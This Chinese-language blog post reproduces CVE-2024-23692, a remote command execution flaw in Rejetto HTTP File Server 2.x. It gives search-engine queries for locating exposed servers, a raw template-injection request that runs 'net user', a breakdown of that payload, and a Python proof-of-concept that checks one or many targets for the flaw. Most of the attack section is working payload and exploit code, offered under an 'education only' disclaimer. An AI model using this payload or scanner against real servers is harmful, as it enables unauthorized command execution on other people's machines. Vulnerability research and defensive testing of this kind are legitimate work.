声明:本文档或演示材料仅供教育和教学目的使用,任何个人或组织使用本文档中的信息进行非法活动,均与本文档的作者或发布者无关。
文章目录
- 漏洞描述
- 漏洞复现
- 测试工具
漏洞描述
Rejetto HTTP文件服务器是一个轻量级的HTTP服务器软件,它允许用户在本地计算机上快速搭建一个文件共享服务。其 2.x系列 存在CVE-2024-23692远程命令执行漏洞,攻击者可在无需登陆的情况下利用模板注入执行任意命令,从而控制服服务器。
漏洞复现
1)信息收集
fofa:app="HFS"
hunter:app.name="HTTP File Server"
巧合是上帝默默操控世界的方式。
2)构造数据包
GET /?n=%0A&cmd=net%20user&search=%25xxx%25url:%password%}{.exec|{.?cmd.}|timeout=15|out=abc.}{.?n.}{.?n.}RESULT:{.?n.}{.^abc.}===={.?n.} HTTP/1.1
Host:ip
代码解释:
/?n=%0A&cmd=net%20user&search=%25xxx%25url:%password%}{.exec|{.?cmd.}|timeout=15|out=abc.}{.?n.}{.?n.}RESULT:{.?n.}{.^abc.}===={.?n.}
这个payload实际上是一个经过编码的命令,让我们更详细地分析其各个组成部分:
-
编码前原始命令:
- 原始命令是这样的:
cmd=net user &search=xxx%url:password - 这里
cmd代表命令,net user是Windows系统中查看用户账户的命令。 &search=xxx%url:password部分是一个搜索条件。
- 原始命令是这样的:
-
URL编码:
%0A是换行符\n的URL编码形式。%25是百分号%的URL编码形式,所以%25xxx%25代表%xxx%。
-
脚本或命令行工具语法:
{.exec|{.?cmd.}|timeout=15|out=abc.}{.?n.}{.?n.}这部分是一个特定脚本或命令行工具的语法,用于执行命令并设置参数。.exec是执行命令的标志。{.?cmd.}是一个动态替换为实际命令的占位符。timeout=15设置了命令执行的超时时间限制为15秒。out=abc.指定了输出结果应该被写入到以abc为前缀的文件中,但具体文件扩展名未知。
-
输出结果:
RESULT:{.?n.}{.?n.}{.^abc.}这部分指定了输出结果的格式。{.?n.}可能是用于输出变量或特定值的占位符。{.^abc.}可能表示将输出追加到之前提到的以abc为前缀的文件中。
-
分隔符:
====用作分隔符,以区分输出中的不同部分。
这个payload可能是用于在远程服务器或网络设备上执行命令,获取用户列表,并搜索包含特定字符串的用户账户。
在回显中看到了用户名,命令被执行,漏洞存在。
测试工具
poc
#!/usr/bin/env python
# -*- coding: utf-8 -*-import http.client
import argparse
from urllib.parse import urlparse
from urllib3.exceptions import InsecureRequestWarning
import ssl# 定义红色和重置终端输出格式的常量,用于高亮显示漏洞提示
RED = '\033[91m'
RESET = '\033[0m'def check_vulnerability(url):"""检查给定URL是否存在Rejetto HTTP File Server远程代码执行漏洞(CVE-2024-23692)。:param url: 待检查的URL字符串。"""try:# 忽略HTTPS证书验证错误,以进行漏洞测试# 忽略不安全的HTTPS请求警告ssl._create_default_https_context = ssl._create_unverified_context# 解析URL以获取主机、方案和路径信息# 解析URLparsed_url = urlparse(url)host = parsed_url.netlocscheme = parsed_url.schemepath = parsed_url.path if parsed_url.path else '/'# 构造利用漏洞的攻击路径# 构造完整的攻击URL路径attack_path = path + "/?n=%0A&cmd=net%20user&search=%25xxx%25url:%password%}{.exec|{.?cmd.}|timeout=15|out=abc.}{.?n.}{.?n.}RESULT:{.?n.}{.^abc.}===={.?n.}"# 根据URL的方案(HTTP或HTTPS)创建连接对象# 根据URL的协议类型,选择合适的连接方式if scheme == "https":conn = http.client.HTTPSConnection(host, context=ssl._create_unverified_context())else:conn = http.client.HTTPConnection(host)# 发送GET请求到构造的攻击路径# 发送请求conn.request("GET", attack_path)response = conn.getresponse()# 读取并解码响应数据data = response.read().decode('utf-8')# 检查响应状态码是否为200且数据中是否包含'Administrator',以判断漏洞是否存在if response.status == 200 and 'Administrator' in data:print(f"{RED}URL [{url}] 存在Rejetto HTTP File Server远程代码执行漏洞(CVE-2024-23692){RESET}")else:print(f"URL [{url}] 不存在漏洞")# 关闭HTTP连接conn.close()except Exception as e:# 打印在检测过程中发生的任何异常print(f"URL [{url}] 在检测过程中发生错误: {e}")def main():"""程序主入口,负责解析命令行参数并调用漏洞检测函数。"""# 创建命令行参数解析器parser = argparse.ArgumentParser(description='检测目标地址是否存在Rejetto HTTP File Server远程代码执行漏洞(CVE-2024-23692)')parser.add_argument('-u', '--url', help='指定目标地址')parser.add_argument('-f', '--file', help='指定包含目标地址的文本文件')# 解析命令行参数args = parser.parse_args()# 如果指定了URL参数if args.url:# 确保URL以HTTP或HTTPS开头,否则添加HTTPif not args.url.startswith("http://") and not args.url.startswith("https://"):args.url = "http://" + args.url# 调用漏洞检测函数check_vulnerability(args.url)# 如果指定了文件参数elif args.file:# 读取文件中的每行作为URL,逐个检查with open(args.file, 'r') as file:urls = file.read().splitlines()for url in urls:# 确保URL以HTTP或HTTPS开头,否则添加HTTPif not url.startswith("http://") and not url.startswith("https://"):url = "http://" + urlcheck_vulnerability(url)if __name__ == '__main__':main()
运行截图
多少事,从来急,天地转,光阴迫,一万年太久,只争朝夕。
